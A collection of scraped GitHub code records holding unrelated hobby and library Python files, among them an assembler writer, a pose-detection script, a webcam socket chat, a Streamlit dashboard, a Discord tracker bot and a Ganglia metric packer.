out.write(\"\\\"\"+str(OutputAssembledLines[i])+\"\\\"\"+\",\"+\"\\n\")\r\n else:\r\n out.write(\"\\\"\"+\"0000000000000000\"+\"\\\"\"+\",\"+\"\\n\") # fill out empty spaces in memory\r\n out.close()\r\nexcept:\r\n print(\"something went wrong during file write!\")\r\n out.close()","repo_name":"KhaledAmgad/-5-stage-pipelined-processor-Harvard-Architecture","sub_path":"AssemblerV2/AssemblerV2.py","file_name":"AssemblerV2.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39580277142","text":"## TEST DATA\nimport cv2\nfrom 
scripts.Openpose.openpose_algorithm import run_openpose_algorithm\n\nnet_res_width = 512\nnet_res_height = 256\n\nresult_from_openpose = run_openpose_algorithm(net_res_width, net_res_height,\n '/Users/lucapomer/Documents/bachelor/YogaPoseDetection/experiments/Pose_Skeletons')\n\ni = 0\nfor item in result_from_openpose:\n cv2.imwrite('/Users/lucapomer/Documents/bachelor/YogaPoseDetection/experiments/result_skeletons/' + str(i) + '.jpg',\n item.output_img)\n i += 1\n","repo_name":"LucaPomer/YogaPoseDetection","sub_path":"scripts/helpers/write_openpose_skeletons.py","file_name":"write_openpose_skeletons.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"17232491609","text":"from client.protocols import protocol\nimport os\n\n\nclass FileContents(protocol.Protocol):\n \"\"\"The contents of changed source files are sent to the server.\"\"\"\n name = 'file_contents'\n\n def on_start(self):\n \"\"\"Find all source files and return their complete contents.\"\"\"\n contents = {}\n for path in self.assignment['src_files']:\n key = os.path.normpath(os.path.split(path)[1])\n with open(path, 'r', encoding='utf-8') as lines:\n value = lines.read()\n contents[key] = value\n return contents\n\n","repo_name":"dudduss/Ants","sub_path":"ok/client/protocols/file_contents.py","file_name":"file_contents.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3492012050","text":"def isprime(number):\n if number < 2:\n return False\n elif number == 2:\n return True\n else:\n for i in range(2, number):\n if number % i == 0:\n return False\n return True\n\n\nwhile True:\n n = input(\"(press q to quit)\\nEnter an integer: \")\n if n == \"q\":\n print(\"Exiting...\")\n break\n else:\n n = int(n)\n if isprime(n):\n print(\"{} is a prime number\".format(n))\n else:\n print(\"{} is not a prime number\".format(n))\n","repo_name":"yusufs-d/Python-Projects","sub_path":"prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40690004460","text":"import cv2\nimport socket\nimport pickle\nimport threading\n\nclass Transmitter(threading.Thread):\n def __init__(self,ip,port):\n threading.Thread.__init__(self) \n self.ip = ip\n self.port = port \n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.sock.connect((ip,port))\n self.cam = cv2.VideoCapture(0)\n\n def run(self):\n while(True):\n try:\n self.ret , self.frame = self.cam.read() \n self.data = pickle.dumps(self.frame)\n self.sock.send(self.data)\n except:\n print(\" -> Broken Pipe ! 
\\n Exiting\")\n break\n \n def __del__(self):\n self.sock.close()\n self.cam.release()\n cv2.destroyAllWindows()\n\nclass Reciever(threading.Thread):\n def __init__(self,ip,port):\n threading.Thread.__init__(self)\n self.ip = ip \n self.port = port\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.sock.bind((ip,port))\n self.sock.listen(1)\n\n def run(self):\n self.conn , self.addr = self.sock.accept()\n print(\"Incoming Connection From{}\".format(self.addr))\n while(True):\n data = self.conn.recv(921781)\n try:\n frame = pickle.loads(data)\n cv2.imshow('Frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n except:\n pass\n \n def __del__(self):\n self.conn.close()\n self.sock.close()\n cv2.destroyAllWindows()\n","repo_name":"HarshVaragiya/Chat-Application","sub_path":"VideoChat/DataStructure.py","file_name":"DataStructure.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"5650252850","text":"# Exercise 2: This program counts the distribution of the hour of the day\r\n# for each of the messages. You can pull the hour from the “From” line\r\n# by finding the time string and then splitting that string into parts using\r\n# the colon character. Once you have accumulated the counts for each\r\n# hour, print out the counts, one per line, sorted by hour \r\nfhand = open('dataFiles/data.txt')\r\nhourList=list()\r\nhourDict=dict()\r\nfor line in fhand:\r\n line=line.rstrip()\r\n if not line.startswith('From '): continue\r\n listLines=line.split()\r\n stringTime=listLines.pop(5)\r\n posColon=(stringTime.find(':'))\r\n hourList=(stringTime[:posColon].split())\r\n for hour in hourList:\r\n hourDict[hour]=hourDict.get(hour,0)+1\r\nhoursList=list()\r\nfor key,val in list(hourDict.items()):\r\n hoursList.append((val,key))\r\n hoursList.sort(reverse=False)\r\nfor val,key in hoursList:\r\n print(key,'th hour', val)\r\n","repo_name":"qamarabbas408/Python-4-Everybody","sub_path":"8tuples/Ex3_tuples8.py","file_name":"Ex3_tuples8.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33127281970","text":"import streamlit as st\r\nimport pandas as pd\r\ndf=pd.read_csv('startupfundcleaned.csv')\r\ndf['date']=pd.to_datetime(df['date'])\r\ndf['year']=df['date'].dt.year\r\ndf['month']=df['date'].dt.month\r\nprint(df.info())\r\nst.set_page_config(layout='wide',page_title='StartUp Analysis')\r\nst.sidebar.title('StartUp Analysis')\r\noption=st.sidebar.selectbox('select any one',('Overall Analysis','Start Up','Investor'))\r\ndef load_overall_analysis():\r\n st.title('Overall Analysis')\r\n # total invested amount\r\n total = round(df['amount'].sum())\r\n # max amount infused in a startup\r\n max_funding = df.groupby(['startup'])['amount'].max().sort_values(ascending=False).values[0]\r\n # avg ticket size\r\n avg_funding = df.groupby('startup')['amount'].sum().mean()\r\n # total funded startups\r\n num_startups = df['startup'].nunique()\r\n col1,col2,col3,col4=st.columns(4)\r\n with col1:\r\n st.metric('total',total)\r\n with col2:\r\n st.metric('Max', str(max_funding) + ' USD')\r\n with col3:\r\n st.metric('Avg',str(round(avg_funding)) + ' USD')\r\n with col4:\r\n st.metric('Funded Startups',num_startups)\r\n st.header('MOM investement')\r\n tab1, tab2= st.tabs([\"total\", \"max\"])\r\n with tab1:\r\n temp_df = df.groupby(['year', 'month'])['amount'].sum().reset_index()\r\n 
temp_df['x_axis'] = temp_df['month'].astype('str') + '-' + temp_df['year'].astype('str')\r\n st.line_chart(temp_df,x='x_axis',y='amount')\r\n with tab2:\r\n temp_df1= df.groupby(['year', 'month'])['amount'].max().reset_index()\r\n temp_df1['x_axis'] = temp_df1['month'].astype('str') + '-' + temp_df1['year'].astype('str')\r\n st.line_chart(temp_df1,x='x_axis',y='amount')\r\ndef loadinvestor(investor):\r\n st.title(investor)\r\n st.header('Recent Investments')\r\n st.dataframe(df[df['investors'].str.contains(investor)][['date','startup','vertical','city','round','amount']].head())\r\n st.header('Biggest investments')\r\n st.dataframe(df[df['investors'].str.contains(investor)].groupby(['startup'])['amount'].sum().head(1))\r\n tab1, tab2= st.tabs([\"sector\", \"YoY investment graph\"])\r\n with tab1:\r\n st.header(\"sector\")\r\n st.line_chart(df[df['investors'].str.contains(investor)].groupby(['vertical'])['amount'].sum())\r\n with tab2:\r\n st.header(\"YoY investment graph\")\r\n st.line_chart(df[df['investors'].str.contains(investor)].groupby(['year'])['amount'].sum())\r\ndef loadstartup(startup):\r\n st.title(startup)\r\nif option=='Overall Analysis':\r\n load_overall_analysis()\r\nelif option=='Start Up':\r\n st.title('Start Up Analysis')\r\n startup=st.sidebar.selectbox('Start Up',sorted(df['startup'].unique().tolist()))\r\n btn1=st.sidebar.button('Find Start Up Details')\r\n if btn1:\r\n loadstartup(startup)\r\nelif option=='Investor':\r\n st.title('Investor Analysis')\r\n investor=st.sidebar.selectbox('Investor',sorted(set(df['investors'].str.split(',').sum())))\r\n btn=st.sidebar.button('Find Investors Details')\r\n if btn:\r\n loadinvestor(investor)","repo_name":"venkateswararao10/streamlitproject","sub_path":"streamlitapp.py","file_name":"streamlitapp.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73383445034","text":"# write a python script to multiply all the number in a list\r\n\r\ndef multi(item):\r\n sum=1\r\n for i in item:\r\n sum=sum*i\r\n return sum\r\na=[5,8,6,4]\r\nprint(multi(a))\r\n\r\n\r\n\r\n","repo_name":"gauravaps/assignment-19","sub_path":"miltiply list in function.py","file_name":"miltiply list in function.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4216547228","text":"from abc import abstractmethod\nfrom typing import Optional, Type\n\nfrom psqlextra.backend.schema import PostgresSchemaEditor\nfrom psqlextra.models import PostgresPartitionedModel\n\n\nclass PostgresPartition:\n \"\"\"Base class for a PostgreSQL table partition.\"\"\"\n\n @abstractmethod\n def name(self) -> str:\n \"\"\"Generates/computes the name for this partition.\"\"\"\n\n @abstractmethod\n def create(\n self,\n model: Type[PostgresPartitionedModel],\n schema_editor: PostgresSchemaEditor,\n comment: Optional[str] = None,\n ) -> None:\n \"\"\"Creates this partition in the database.\"\"\"\n\n @abstractmethod\n def delete(\n self,\n model: Type[PostgresPartitionedModel],\n schema_editor: PostgresSchemaEditor,\n ) -> None:\n \"\"\"Deletes this partition from the database.\"\"\"\n\n def deconstruct(self) -> dict:\n \"\"\"Deconstructs this partition into a dict of attributes/fields.\"\"\"\n\n return {\"name\": self.name()}\n\n\n__all__ = 
[\"PostgresPartition\"]\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"psqlextra/partitioning/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"10079975374","text":"from .SLFNet import SLFNet\n\nMODELS = {\n \"SLFNet\": SLFNet\n}\n\ndef get_model(name: str):\n \"\"\"Get backbone given the name\"\"\"\n if name not in MODELS.keys():\n raise ValueError(\n f\"Model {name} not in model list. Valid models are {MODELS.keys()}\"\n )\n return MODELS[name]","repo_name":"zhangyj85/SLFNet-A-Stereo-and-LiDAR-Fusion-Network-for-Depth-Completion","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"18113221820","text":"import nextcord\r\nfrom nextcord.ext import commands\r\nfrom database import knotifier\r\nfrom config import token\r\nimport bato\r\nimport actions\r\nimport threading\r\nimport time\r\nimport re\r\n\r\nintents = nextcord.Intents.default()\r\nintents.message_content = True\r\n\r\nknotifier.initiate()\r\n\r\n# Define the function that runs the thread\r\ndef run_thread():\r\n while True:\r\n # Call your function\r\n actions.check_for_new()\r\n # Sleep for half an hour\r\n time.sleep(1800)\r\n\r\n# Create and start the thread\r\nthread = threading.Thread(target=run_thread)\r\nthread.start()\r\n\r\nbot = commands.Bot(command_prefix=\"/\", intents=intents)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f\"Logged in as {bot.user.name} ({bot.user.id})\")\r\n print(\"------\")\r\n\r\n@bot.slash_command(name=\"track\", description=\"Tracks series chapters\")\r\nasync def addtrack(ctx, link: str):\r\n email = knotifier.db.get_email(ctx.user.id)\r\n telegram_chat_id = knotifier.db.get_telegram_chat_id(ctx.user.id)\r\n\r\n if email is None and telegram_chat_id is None:\r\n await ctx.send(\"Please set your email or Telegram channel ID first to receive notifications.\")\r\n return\r\n\r\n seriesId = None\r\n if '/series/' in link: # v2\r\n seriesId = link.split(\"/series/\")[1].split(\"/\")[0]\r\n elif '/title/' in link: # v3\r\n seriesId = link.split(\"/title/\")[1].split(\"/\")[0].split(\"-\")[0]\r\n elif link.isdigit():\r\n seriesId = int(link)\r\n if seriesId is None:\r\n await ctx.send(\"Invalid series link.\")\r\n return\r\n\r\n # Check if the series is already tracked for the user\r\n tracked_series = knotifier.db.get_tracked_series(ctx.user.id)\r\n if any(series[0] == seriesId for series in tracked_series):\r\n await ctx.send(\"This series is already being tracked.\")\r\n return\r\n\r\n title = bato.get_metadata(seriesId)\r\n if len(title) > 0 and type(title) == str:\r\n knotifier.db.track(ctx.user.id, seriesId, bato.get_chapters(seriesId), title)\r\n await ctx.send(f\"Now tracking {title}\")\r\n else:\r\n await ctx.send(\"Invalid series link\")\r\n\r\n@bot.slash_command(name=\"email\", description=\"Sets your email to recieve notifications\")\r\nasync def setemail(ctx, email: str):\r\n pattern = r'^[\\w\\.-]+@[\\w\\.-]+\\.\\w+$'\r\n if re.match(pattern, email):\r\n if knotifier.db.save_email(ctx.user.id, email):\r\n await ctx.send(f\"Email set to {email}\")\r\n #TODO maybe verify'''\r\n else:\r\n await ctx.send(\"Invalid email\")\r\n\r\n@bot.slash_command(name=\"list\", description=\"Lists your tracked series\")\r\nasync def list(ctx,):\r\n s = 
knotifier.db.get_tracked_series(ctx.user.id)\r\n if s == [] or s is None:\r\n await ctx.send(\"You are not tracking any series\")\r\n return\r\n if s is not None:\r\n msg = \"\\n\"\r\n for series_id, friendly_name in s:\r\n print(f\"Series ID: {series_id}, Friendly Name: {friendly_name}\")\r\n msg += f\"`{friendly_name}` - \\n\"\r\n msg += \"\\n\"\r\n await ctx.send(f\"Tracking series: {msg}\")\r\n\r\n@bot.slash_command(name=\"telegram\", description=\"Sets your Telegram channel ID\")\r\nasync def settelegram(ctx, channel_id: str):\r\n if channel_id.isdigit():\r\n channel_id = int(channel_id)\r\n if knotifier.db.save_telegram_chat_id(ctx.user.id, channel_id):\r\n await ctx.send(f\"Telegram channel ID set to {channel_id}\")\r\n else:\r\n await ctx.send(\"Failed to set Telegram channel ID\")\r\n else:\r\n await ctx.send(\"Please provide a valid Telegram channel ID.\\nTo retrieve your Telegram channel ID, please use the Username to ID Bot\\n\")\r\n\r\nbot.run(token())\r\n","repo_name":"1x6/knotifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43856500300","text":"import os\nimport cv2\nimport math3d as m3d\nimport math\nfrom scipy.spatial.transform import Rotation as R\nimport requests\nfrom tqdm import tqdm\n\ndef create_dir_not_exist(path):\n if not os.path.exists(path):\n os.makedirs(path)\n \ndef draw_circle(image, radius):\n \"\"\"Draw a circle at the center of the given image.\"\"\"\n h, w = image.shape[:2]\n center = (w // 2, h // 2)\n\n # Evaluate radius\n# radius = max(3, radius)\n inner_radius = radius\n cv2.circle(image, center, inner_radius, (255, 255, 255), -1)\n# cv2.circle(image, center, inner_radius, (0, 0, 0), 2)\n return image\n\n\ndef world_to_gripper_orn(pitch, roll, yaw):\n grip_rot = m3d.Transform()\n grip_rot.pos = (0,0,0)\n grip_rot.orient.rotate_yb(math.radians(roll)) # roll\n grip_rot.orient.rotate_xb(math.radians(pitch)) #pitch\n grip_rot.orient.rotate_zb(math.radians(yaw)) #yaw\n grip_matrix = grip_rot.get_matrix()\n robot_Orn = R.from_matrix(grip_matrix[:3,:3]).as_quat()\n return robot_Orn\n\ndef change_urdf_fingerlength(robot_path, tmp_z):\n #read input file\n fin = open(robot_path, \"rt\")\n #read file contents to string\n data = fin.readlines()\n # get z of joint _ short finger\n tmp = data[178].split(' ')\n #tmp_z, 0.02 向下?, -0.02,向上?\n tmp[7] = str(tmp_z)\n tmp = ' '.join(tmp)\n data[178] = tmp\n #close the input file\n fin.close()\n #open the input file in write mode\n fin = open(robot_path, \"wt\")\n #overrite the input file with the resulting data\n fin.writelines(data)\n #close the file\n fin.close()\n\n####################\n#download file from google drive\ndef download_file_from_google_drive(id, destination):\n URL = \"https://docs.google.com/uc?export=download\"\n\n session = requests.Session()\n\n response = session.get(URL, params = { 'id' : id }, stream = True)\n token = get_confirm_token(response)\n\n if token:\n params = { 'id' : id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n\n save_response_content(response, destination) \n\ndef get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef save_response_content(response, destination):\n CHUNK_SIZE = 32768\n\n with open(destination, \"wb\") as f:\n for chunk in tqdm(response.iter_content(CHUNK_SIZE)):\n if chunk: # 
filter out keep-alive new chunks\n f.write(chunk)\n###################","repo_name":"HKUST-RML/Learning-to-Grasp-by-Digging","sub_path":"tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"15250717409","text":"#!/usr/bin/env python3\n\n\ndef tidy(N):\n return list(N) == sorted(N)\n\ndef solve(N):\n if N == '0':\n return ''\n if tidy(N) or len(N) <= 1:\n return N\n return solve(str(int(N[:-1]) - 1)) + '9'\n\nT = int(input())\n\nfor case_number in range(1, T+1):\n N = input() # a string\n print('Case #%d:' % case_number, solve(N))\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/17/02/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"22267724981","text":"import torch\n\nclass MetricRUC:\n def __init__(self, name: str, classnum: int):\n self.name = name.upper()\n\n self.correct = 0\n self.total = 0\n self.target_num = torch.zeros((1, classnum))\n self.predict_num = torch.zeros((1, classnum))\n self.acc_num = torch.zeros((1, classnum))\n\n def update(self, netout, target):\n\n target = target.detach().cpu().long()\n netout = netout.detach().cpu()\n _, pred = torch.max(netout.data, 1)\n self.total += target.size(0)\n self.correct += pred.eq(target.data).cpu().sum()\n pre_mask = torch.zeros(netout.size()).scatter_(1, pred.view(-1, 1), 1.)\n self.predict_num += pre_mask.sum(0)\n tar_mask = torch.zeros(netout.size()).scatter_(1, target.view(-1, 1), 1.)\n self.target_num += tar_mask.sum(0)\n acc_mask = pre_mask * tar_mask\n self.acc_num += acc_mask.sum(0)\n\n def summary(self):\n recall = self.acc_num / self.target_num\n precision = self.acc_num / self.predict_num\n F1 = 2 * recall * precision / (recall + precision)\n accuracy = self.acc_num.sum(1) / self.target_num.sum(1)\n # 精度调整\n recall = (recall.numpy()[0] * 100).round(3)\n precision = (precision.numpy()[0] * 100).round(3)\n F1 = (F1.numpy()[0] * 100).round(3)\n accuracy = (accuracy.numpy()[0] * 100).round(3)\n\n print(f'-----------------------{self.name}-------------------------')\n print(f'{self.name} RECALL', \" \".join('%s' % id for id in recall))\n print(f'{self.name} PRECISION', \" \".join('%s' % id for id in precision))\n print(f'{self.name} F1', \" \".join('%s' % id for id in F1))\n print(f'{self.name} accuracy', accuracy)\n\n return recall, precision, accuracy, F1\n\n\n\n\ndef validate(net, validation_dataset, lossfn, local_rank):\n\n net.eval()\n\n result_dict = {}\n\n total_loss_p2 = 0.0\n total_loss_p5 = 0.0\n total_loss_p18 = 0.0\n\n summary_p2 = MetricRUC(name = 'p2', classnum=OUTPUT_SIZE//3)\n summary_p5 = MetricRUC(name = 'p5', classnum=OUTPUT_SIZE//3)\n summary_p18 = MetricRUC(name = 'p18', classnum=OUTPUT_SIZE//3)\n total_loss = 0\n with torch.no_grad():\n for x, y in validation_dataset:\n y_p2 = y[..., 0]\n y_p5 = y[..., 1]\n y_p18 = y[..., 2]\n h_p2, h_p5, h_p18 = net(x.permute(0, 2, 1).to(local_rank))\n\n loss_p2 = lossfn[0](h_p2, y_p2.to(local_rank).long())\n loss_p5 = lossfn[1](h_p5, y_p5.to(local_rank).long())\n loss_p18 = lossfn[2](h_p18, y_p18.to(local_rank).long())\n\n total_loss += (0.2 * loss_p2 + 0.35 * loss_p5 + 0.45 * loss_p18).item()\n\n total_loss_p2 += loss_p2.item()\n total_loss_p5 += loss_p5.item()\n total_loss_p18 += loss_p18.item()\n\n summary_p2.update(h_p2, y_p2)\n summary_p5.update(h_p5, y_p5)\n summary_p18.update(h_p18, 
y_p18)\n\n recall, precision, accuracy, F1 = summary_p2.summary()\n result_dict['total_loss'] = total_loss / len(validation_dataset)\n result_dict['p2'] = {'loss': total_loss_p2 / len(validation_dataset),\n 'recall': recall,\n 'precision': precision,\n 'accuracy': accuracy,\n 'F1': F1}\n recall, precision, accuracy, F1 = summary_p5.summary()\n result_dict['p5'] = {'loss': total_loss_p5 / len(validation_dataset),\n 'recall': recall,\n 'precision': precision,\n 'accuracy': accuracy,\n 'F1': F1}\n recall, precision, accuracy, F1 = summary_p18.summary()\n result_dict['p18'] = {'loss': total_loss_p18 / len(validation_dataset),\n 'recall': recall,\n 'precision': precision,\n 'accuracy': accuracy,\n 'F1': F1}\n return result_dict","repo_name":"xfx88/SGD-HFT-Intern","sub_path":"Projects/T0/CNN/train_dir_0/roc_auc_calculation.py","file_name":"roc_auc_calculation.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13339203503","text":"'''You are given an integer array nums consisting of n elements, and an integer k.\r\n\r\nFind a contiguous subarray whose length is equal to k that has the maximum average value and return this value. Any answer with a calculation error less than 10-5 will be accepted.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: nums = [1,12,-5,-6,50,3], k = 4\r\nOutput: 12.75000\r\nExplanation: Maximum average is (12 - 5 - 6 + 50) / 4 = 51 / 4 = 12.75\r\nExample 2:\r\n\r\nInput: nums = [5], k = 1\r\nOutput: 5.00000\r\n \r\n\r\nConstraints:\r\n\r\nn == nums.length\r\n1 <= k <= n <= 105\r\n-104 <= nums[i] <= 104'''\r\n\r\n\r\nclass Solution(object):\r\n def findMaxAverage(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: float\r\n \"\"\"\r\n # Calculate the initial sum of the first k elements\r\n current_sum = sum(nums[:k])\r\n max_average = current_sum / float(k) # Initialize max_average with the average of the first subarray\r\n\r\n # Slide the window through the array\r\n for i in range(k, len(nums)):\r\n # Add the current element to the window sum\r\n current_sum += nums[i]\r\n # Remove the first element from the window sum\r\n current_sum -= nums[i - k]\r\n # Calculate the average of the current subarray\r\n current_average = current_sum / float(k)\r\n # Update max_average if the current_average is greater\r\n max_average = max(max_average, current_average)\r\n\r\n return max_average\r\n\r\n# Example usage\r\nnums = [1, 12, -5, -6, 50, 3]\r\nk = 4\r\nsolution = Solution()\r\nresult = solution.findMaxAverage(nums, k)\r\nprint(result)\r\n\r\n","repo_name":"PandaFlo/LeetCode","sub_path":"Python/findMaxAverage.py","file_name":"findMaxAverage.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9529746638","text":"N,M = map(int,input().split())\nlis1 = input().split()\ndict1 = {}\nfor elem in lis1:\n dict1[elem] = True\n\nlis2 = input().split()\nintersection_count = 0\nfor elem in lis2:\n if elem in dict1:\n intersection_count +=1\n \nans = N + M - intersection_count*2\nprint(ans)","repo_name":"feelgom/problem-solving","sub_path":"BOJ/BOJ1269_대칭차집합.py","file_name":"BOJ1269_대칭차집합.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1637098155","text":"# 분할 정복 위해 꼭 잘 풀어봐 mm이랑 같이 보기\n\n# 민코딩 29.5 - 4\n\n# 정렬\n# 선택, 삽입, 버블 - n^2\n# 계수(counting) - n\n# 힙 합병 퀵 - 
nlogn\n\n# 정렬은 면접의 단골 손님\n# : 각 정렬 별 특징, 시간 복잡도\n\n\n\n# 합병 정렬 메인 코드\n\n\n# 합병 정렬\narr = [2,7,5,3,1,5,9,2]\nresult = [0]*8\n\ndef merge(start,end):\n global index,arr,index\n mid = (start+end)//2\n if start >= end: return\n\n # 쪼개기\n merge(start,mid)\n merge(mid+1,end)\n\n a = start\n b = mid + 1\n index = 0\n\n while 1:\n if a > mid and b > end: break\n if a > mid:\n result[index] = arr[b]\n index += 1\n b += 1\n elif b > end:\n result[index] = arr[a]\n index += 1\n a += 1\n elif arr[a]<=arr[b]:\n result[index] = arr[a]\n a += 1\n index += 1\n else:\n result[index]=arr[b]\n b += 1\n index += 1\n\n for i in range(index):\n arr[start+i] = result[i]\n\n\nmerge(0,7)\nprint(*result)\n\n\n# 퀵 정렬\n# 핵심 코드\n# 4 1 7 9 6 3 3 6\narr = list(map(int,input().split()))\npivot = arr[0]\n\na = 1\nb = len(arr) - 1\n\nwhile 1:\n while a < len(arr) and arr[a]<=pivot:\n a += 1\n while b>=0 and arr[b]>pivot:\n b -= 1\n if a > b:\n break\n arr[a],arr[b] = arr[b],arr[a]\narr[0],arr[b] = arr[b],arr[0]\nprint(*arr)\n\n# 완성하면\n\narr = [4,1,7,9,6,3,3,6]\n\ndef quick(start,end):\n if start >= end: return\n\n # 핵심 코드\n pivot=start\n a = start+1\n b=end\n\n while 1:\n while a <= end and arr[a] <= arr[pivot]:\n a+=1\n while b>= start and arr[b] > arr[pivot]:\n b-=1\n if a > b: break\n arr[a],arr[b] = arr[b],arr[a]\n arr[pivot],arr[b] = arr[b],arr[pivot]\n\n\n quick(start,b-1)\n quick(b+1,end)\nquick(0,7)\nprint(*arr)\n\n# 우선순위 큐\nimport heapq # 이걸 쓴다\n# from queue import priorityQueue # 이게 더 느리다\n\narr = [] # 함수 사용 시 이 리스트를 인자로 넘긴다!\n# 루트 노드 이외의 정렬 크게 필요 x\nheapq.heappush(arr,4)\nheapq.heappush(arr,2)\nheapq.heappush(arr,3)\nheapq.heappush(arr,7)\n\n# print(heapq.heappop(arr)) # 우선 순위 높은게 가장 먼저 출력\n# print(heapq.heappop(arr))\n# print(heapq.heappop(arr))\n# print(heapq.heappop(arr))\n\nfor i in range(len(arr)):\n print(heapq.heappop(arr), end=' ')\nprint()\n\nheapq.heappush(arr,4)\nheapq.heappush(arr,2)\nheapq.heappush(arr,3)\nheapq.heappush(arr,7)\nwhile arr:\n node = heapq.heappop(arr)\n print(node,end=' ')\n# 시간 복잡도 logN\n\nprint()\n# 오름차순으로 출력하기 (우선순위큐 사용)\nimport heapq\narr = [234,56,234,1,45,456,23]\nheap = []\nfor i in range(len(arr)):\n heapq.heappush(heap,arr[i])\nfor i in range(len(arr)):\n print(heapq.heappop(heap),end=' ')\n\nprint()\n# 방법 2\nheapq.heapify(arr) #heapify를 이용해서 한번에 heap의 자료형으로 바꾸기 가능\nfor i in range(len(arr)):\n print(heapq.heappop(arr),end=' ')\nprint()\n\n\n# Max heap으로 바꾸기 1\nimport heapq\narr = [34,213,57,1,2,54,2,65]\nheap = []\nfor i in range(len(arr)):\n heapq.heappush(heap,-arr[i]) # arr[i] 값에 음수를 줌(python)\nfor i in range(len(arr)):\n # print(heapq.heappop(heap)*-1)\n print(-heapq.heappop(heap))\n\n# Max heap으로 바꾸기 1-1\nimport heapq\narr = [34,213,57,1,2,54,2,65]\nheap = []\nfor i in range(len(arr)):\n heapq.heappush(heap,(-arr[i],arr[i]))\nfor i in range(len(arr)):\n print(heapq.heappop(heap)[1],end=' ')\nprint()\n# Max heap으로 바꾸기 2\n\nimport heapq\narr = [34,213,57,1,2,54,2,65]\nheap = []\nheap = list(map(lambda x:-x,arr))\nheapq.heapify(heap)\nfor i in range(len(arr)):\n print(-heapq.heappop(heap),end=' ')\nprint()\n\nimport heapq\nn = int(input())\ncard = []\nfor i in range(n):\n heapq.heappush(card,int(input()))\nans = 0\nwhile len(card)>1:\n temp1 = heapq.heappop(card)\n temp2 = heapq.heappop(card)\n ans+=temp1+temp2\n 
heapq.heappush(card,temp1+temp2)\nprint(ans)\n","repo_name":"GureumKim/BOJ","sub_path":"Algos/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2525268907","text":"from xdrlib import Packer, Unpacker\nimport socket\n\nslope_str2int = {'zero':0,\n 'positive':1,\n 'negative':2,\n 'both':3,\n 'unspecified':4}\n\n# could be autogenerated from previous but whatever\nslope_int2str = {0: 'zero',\n 1: 'positive',\n 2: 'negative',\n 3: 'both',\n 4: 'unspecified'}\n\ndef gmetric_write_meta(HOST, NAME, TYPE, UNITS, SLOPE, TMAX, DMAX, GROUP):\n \"\"\"\n Arguments are in all upper-case to match XML\n \"\"\"\n packer = Packer()\n \"\"\"\n ganglia message formats \n gmetadata_full = 128,\n gmetric_ushort = 129,\n gmetric_short = 130,\n gmetric_int = 131,\n gmetric_uint = 132,\n gmetric_string = 133,\n gmetric_float = 134,\n gmetric_double = 135\n \"\"\"\n packer.pack_int(128) # type gmetadata_full\n packer.pack_string(HOST)\n packer.pack_string(NAME)\n packer.pack_int(0)\n packer.pack_string(TYPE)\n packer.pack_string(NAME)\n packer.pack_string(UNITS)\n packer.pack_int(slope_str2int[SLOPE]) # map slope string to int\n packer.pack_int(TMAX)\n packer.pack_int(DMAX)\n \n packer.pack_int(1)\n packer.pack_string(\"GROUP\")\n packer.pack_string(GROUP)\n \n return packer.get_buffer()\n \ndef gmetric_write(ID, HOST, NAME, VAL):\n \"\"\"\n Arguments are in all upper-case to match XML\n \"\"\"\n packer = Packer()\n packer.pack_int(133)\n packer.pack_string(HOST)\n packer.pack_string(NAME)\n 